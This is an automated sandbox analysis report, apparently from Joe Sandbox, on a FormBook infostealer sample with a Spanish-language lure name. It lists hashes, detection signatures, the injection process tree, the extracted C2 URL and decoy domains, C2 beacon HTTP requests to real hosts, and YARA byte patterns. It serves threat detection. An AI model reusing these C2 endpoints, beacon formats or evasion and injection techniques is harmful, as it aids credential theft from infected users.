
Analysis Report: transferir copia_98087.exe

Overview

General Information

Sample Name: transferir copia_98087.exe
Analysis ID: 356823
MD5: ca35b660415defe96fe6af4eb3a45d86
SHA1: 61345b9633b50081b63b65bbf95410d265ea6ce5
SHA256: a3327c95da3017b7f9f87eeeef8ccba7373e363facad5024432b7aba20a9b832
Tags: ESP, exe, Formbook, geo

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • transferir copia_98087.exe (PID: 3096 cmdline: 'C:\Users\user\Desktop\transferir copia_98087.exe' MD5: CA35B660415DEFE96FE6AF4EB3A45D86)
    • transferir copia_98087.exe (PID: 5376 cmdline: C:\Users\user\Desktop\transferir copia_98087.exe MD5: CA35B660415DEFE96FE6AF4EB3A45D86)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 2576 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4364 cmdline: /c del 'C:\Users\user\Desktop\transferir copia_98087.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.basiclablife.com/8zdn/"], "decoy": ["yourherogarden.net", "onlineharambee.net", "cerrajeriaurgencias24horas.com", "distritoforex.com", "verifyclientserverssr.com", "dandwg.com", "co2-zero.global", "joshssl.com", "meckwt.com", "theammf.com", "rawclectic.com", "gzgnetwork.com", "richmondavenuecoc.com", "nicolelyte.com", "thetinyclosetboutique.com", "llt-group.net", "seven-sky-design.com", "joganifinancialgrp.com", "elementsvapes.com", "bingent.info", "quaichshop.net", "unethicalsgsblaw.com", "matts.digital", "lexafit.com", "covidwanderings.com", "pk972.com", "fanashaadivine.com", "winharadesigns.com", "adosignite.com", "goldengatesimmigration.com", "unazampanelcuore.com", "gasexecutive.com", "sdps365.net", "worthingtonminnesota.com", "ducatsupply.com", "beijinghui1.icu", "hn-bet.com", "homeforsalesteamboat.com", "tiaozaoxinlingshou.net", "mrbils.net", "depuitycollector.com", "winningovereating.com", "usedonlyrvs.com", "verbinoz.com", "threepocketmedia.com", "lizbing.com", "fivestardogfoods.com", "edevercal.net", "irisettelment.com", "beautyphernalia.com", "terrawindglobalprotection.net", "floridaindian.com", "kidzistore.com", "kulisbet117.com", "logingatech.info", "ftdk.net", "lawwise.legal", "bruthawar.com", "lemonpublishing.com", "6781529.com", "zfxsotc.com", "shroomsdrop.com", "ahm-app.com", "finesilversmith.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 1.2.transferir copia_98087.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 1.2.transferir copia_98087.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.transferir copia_98087.exe.400000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.transferir copia_98087.exe.317996c.1.raw.unpack; Rule: JoeSecurity_AntiVM_3; Description: Yara detected AntiVM_3; Author: Joe Security
Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 1.2.transferir copia_98087.exe.400000.0.unpack; Malware Configuration Extractor: FormBook (configuration identical to the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: transferir copia_98087.exe; Virustotal: Detection: 22%
Source: transferir copia_98087.exe; ReversingLabs: Detection: 12%
Yara detected FormBook
Source: Yara match; File source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPE
Source: 1.2.transferir copia_98087.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: transferir copia_98087.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: transferir copia_98087.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: msdt.pdbGCTL; source: transferir copia_98087.exe, 00000001.00000002.272134673.0000000003720000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: transferir copia_98087.exe, 00000001.00000002.271679191.00000000019E0000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.483918470.0000000004950000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: transferir copia_98087.exe, msdt.exe
Source: Binary string: msdt.pdb; source: transferir copia_98087.exe, 00000001.00000002.272134673.0000000003720000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\transferir copia_98087.exe; Code function: 4x nop then pop edi (1_2_004162C2)
Source: C:\Windows\SysWOW64\msdt.exe; Code function: 4x nop then pop edi (5_2_025262C2)

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 108.62.73.206:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 108.62.73.206:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 108.62.73.206:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 18.189.205.91:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 18.189.205.91:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 18.189.205.91:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.basiclablife.com/8zdn/
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=SUc3155gDWt5wcoflZcZzViJ8x0waKhO+xEIOi+15/K5BoZoLZ14fR9wugBfYGntPchb&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.unazampanelcuore.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=/2j9R2c14anpqf93w73dauHGA2TQKIR5Q7oZ32qrr3zEGdcNMDJzBydR7UkO3mu0OgLM&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.floridaindian.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=tcuwTISCal6Za70kmDoHryScybsdFOei7/WOW4uZGfRR2kwAWg6MdyjVPec/+BbHDhr0&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.quaichshop.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=VcGUHpmld1zswDwg40mcNwm1CX0p/o+pgHyf/FjbYLUTXfqCXvPFwiBdk0mlGpZRYzTf&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.basiclablife.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=XOXl3Nuj7M9zcIBR6B45qltQ4dmo97Szsxf/DI8gOGgyBhu8HbEkl8wbqGipvTOnLwwM&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.elementsvapes.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=hIXmrhUyU1aP5+vldRGL92fa8Yv5W8V1zdDiddkx2jBPb190TW7wCmtqgCRS1U4M3bOQ&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.hn-bet.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=hAX0XCk4QOcgLnZ0keH4mYw4W1HPTbDogNdlOttC2YdmEpNB6eRk1m0w/4WJXRKcYwe6&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.gasexecutive.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /8zdn/?kH=eGnYEUgg+wSQcZ375yCgdfFf6E1Kt+cpyPOB6e9JmwPPtBsaC8CQtumAL6bFnIfy9ObU&Bld=UVCtYPUHlPSP HTTP/1.1; Host: www.shroomsdrop.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 46.23.69.44
Source: Joe Sandbox View; IP Address: 34.102.136.180
Source: Joe Sandbox View; ASN Name: UK2NET-ASGB
Source: unknown; DNS traffic detected: queries for: www.unazampanelcuore.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Tue, 23 Feb 2021 16:22:34 GMT; Content-Type: text/html; Content-Length: 498; Connection: close; Last-Modified: Mon, 01 Dec 2014 15:09:45 GMT; Chimera-API-Server: api1.uk.chimera.uk2group.com; X-Powered-By: Perl Dancer 1.3512; Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
Source: explorer.exe, 00000002.00000000.257307365.000000000F6E0000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: transferir copia_98087.exe; String found in binary or memory: http://qunect.com/download/QuNect.exe
Source: transferir copia_98087.exe; String found in binary or memory: http://qunect.com/download/QuNect.exeMOperation
Source: transferir copia_98087.exe; String found in binary or memory: http://validator.w3.org/check?uri=referer
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: transferir copia_98087.exe, 00000000.00000002.226153911.0000000001707000.00000004.00000040.sdmp; String found in binary or memory: http://www.fontbureau.comoj
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: transferir copia_98087.exe, 00000000.00000003.213165665.0000000005F7B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fonts.comaN
Source: transferir copia_98087.exe, 00000000.00000003.213165665.0000000005F7B000.00000004.00000001.sdmp; String found in binary or memory: http://www.fonts.comn6
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, transferir copia_98087.exe, 00000000.00000003.214660820.0000000005F6E000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: transferir copia_98087.exe, 00000000.00000003.214660820.0000000005F6E000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn?
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: msdt.exe, 00000005.00000002.482494718.0000000002B17000.00000004.00000020.sdmp; String found in binary or memory: http://www.tiaozaoxinlingshou.net/8zdn/?kH=/eNJxuqSWy6YBrvXrJK0
Source: explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: transferir copia_98087.exe, 00000000.00000003.213582395.0000000005F7B000.00000004.00000001.sdmp; String found in binary or memory: http://www.tiro.comFa
Source: transferir copia_98087.exe, 00000000.00000003.213440315.0000000005F7B000.00000004.00000001.sdmp; String found in binary or memory: http://www.tiro.comj
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: transferir copia_98087.exe, 00000000.00000002.226455880.0000000003111000.00000004.00000001.sdmp; String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: transferir copia_98087.exe, 00000000.00000002.225323893.0000000001438000.00000004.00000020.sdmp; Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_004181C0 NtCreateFile
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_00418270 NtReadFile
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_004182F0 NtClose
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_004183A0 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_00418212 NtReadFile
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_004182EF NtClose
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_0041839B NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A499A0 NtCreateSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A495D0 NtClose, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49910 NtAdjustPrivilegesToken, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49540 NtReadFile, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A498F0 NtReadVirtualMemory, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49860 NtQuerySystemInformation, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49840 NtDelayExecution, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A497A0 NtUnmapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49780 NtMapViewOfSection, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49FE0 NtCreateMutant, LdrInitializeThunk
            Source: C:\Users\user\Desktop\transferir copia_98087.exe, Code function: 1_2_01A49710 NtQueryInformationToken, LdrInitializeThunk
